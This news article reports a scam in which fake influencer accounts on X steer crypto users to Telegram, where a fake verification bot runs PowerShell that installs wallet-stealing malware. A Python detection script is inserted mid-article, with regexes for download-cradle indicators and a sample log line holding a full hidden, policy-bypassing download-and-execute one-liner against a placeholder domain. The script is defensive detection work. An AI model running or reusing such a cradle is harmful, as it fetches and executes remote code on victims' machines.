Telegram bots are used by scammers to spread crypto-stealing malware.

Scammers are employing a novel and sophisticated strategy to steal cryptocurrency, combining fake X (formerly Twitter) accounts, fraudulent Telegram channels, and malicious bots, according to blockchain security firm Scam Sniffer.

This marks a concerning evolution in cybercrime targeting the crypto community. In a Dec. 10 post on X, Scam Sniffer described the methodology. Scammers set up fake X accounts impersonating prominent crypto influencers. These accounts are used to lure unsuspecting users into Telegram groups by offering exclusive investment insights and other enticing opportunities. Once users join the Telegram group, they are asked to complete a verification process through “OfficiaISafeguardBot,” a fake Telegram verification bot.

The bot employs psychological tactics, such as creating a sense of urgency by providing very short timeframes for verification. However, instead of verifying anything, the bot injects malicious PowerShell code into the user’s system. This code downloads and executes malware, compromising the victim’s computer and accessing crypto wallets. The malware often targets private keys, enabling the scammers to raid the victims' wallets and steal their funds.
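A defender-side check for the download-and-execute PowerShell described above, added here as an example and not taken from Scam Sniffer or the article: it scores PowerShell script-block log entries for the indicators that make up a download cradle and flags the combination rather than any single one, so an administrator's plain file download is not reported. The pipe-delimited layout and the use of Event ID 4104 ScriptBlockText are assumptions; the log lines are constructed.

```python
import re
from typing import Dict, List

# Indicators seen in PowerShell download-and-execute one-liners. None is
# malicious alone (admins fetch files too), so a verdict needs a combination.
INDICATORS = {
    "remote_fetch": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
    "invoke_expression": re.compile(r"\biex\b|Invoke-Expression", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "policy_bypass": re.compile(r"-(?:executionpolicy|ep)\s+bypass", re.I),
}

def analyze_script_block(text: str) -> Dict[str, object]:
    """Return the matched indicator names and a verdict for one script block."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # Fetching remote content and then evaluating it is the cradle shape;
    # a plain download (e.g. to -OutFile) with nothing else is not flagged.
    executes = {"invoke_expression", "encoded_command"} & set(hits)
    flagged = ("remote_fetch" in hits and bool(executes)) or len(hits) >= 3
    return {"indicators": hits, "flagged": flagged}

def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Parse 'EventID|Host|User|ScriptBlockText' lines (assumed layout) and
    return one finding per flagged Event 4104 entry."""
    findings = []
    for line in lines:
        parts = line.rstrip("\n").split("|", 3)
        if len(parts) != 4 or parts[0] != "4104":
            continue
        _event_id, host, user, text = parts
        result = analyze_script_block(text)
        if result["flagged"]:
            findings.append({"host": host, "user": user, **result})
    return findings

# Constructed sample entries (not real telemetry); the domain is a placeholder.
SAMPLE_LOG = [
    "4104|WS01|alice|Get-ChildItem C:\\Users\\alice\\Documents",
    "4104|WS02|bob|Invoke-WebRequest https://example.invalid/report.json -OutFile report.json",
    "4104|WS03|carol|powershell -w hidden -ep bypass -c \"iex (New-Object Net.WebClient).DownloadString('https://example.invalid/verify')\"",
    "4103|WS03|carol|Write-Host done",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['host']} {f['user']}: {', '.join(f['indicators'])}")
```

Only the WS03 entry is reported; the WS02 download to a file matches one indicator and stays below the threshold.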

Scam Sniffer has identified numerous cases where this method has led to significant crypto theft. The firm confirmed that in all recent instances it has analyzed, the root cause was traced back to the fake verification bot. While it remains uncertain whether other malicious bots are involved, Scam Sniffer noted how easy it is for scammers to replicate this technique and impersonate additional accounts.

According to Scam Sniffer, while malware targeting crypto users is not new, the infrastructure behind these scams has advanced considerably. This evolution has given rise to “scam-as-a-service” operations, where scammers develop tools like crypto wallet-draining malware and lease them to phishing scammers. These operations have become more sophisticated as demand and the profitability of such scams increase.

Impersonation scams have also seen a sharp rise. Scam Sniffer’s monitoring system detected an average of 300 fake X accounts daily in December, almost double November’s average of 160. These fake accounts often share malicious links and promote fake tokens, preying on unsuspecting users.

At least two victims have reportedly lost over $3 million by clicking on these malicious links and unknowingly signing fraudulent transactions. These staggering losses highlight the effectiveness of this combined social engineering and malware tactic.

The risk isn’t limited to casual crypto investors. Web3 professionals are also being targeted. Cado Security Labs recently uncovered a campaign using fake meeting apps to inject malware, stealing credentials for websites, applications, and crypto wallets. This tactic underscores the expanding scope of threats within the Web3 ecosystem, targeting not only funds but also sensitive credentials and access.

Adding to the urgency, Web3 security platform Cyvers issued a warning about a likely increase in phishing attacks during December. With the holiday season driving a surge in online transactions, hackers are seeking to exploit the increased activity.
